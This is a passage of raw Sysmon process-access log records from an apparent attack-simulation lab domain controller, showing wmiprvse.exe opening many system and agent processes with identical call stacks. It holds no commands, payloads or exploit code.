Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 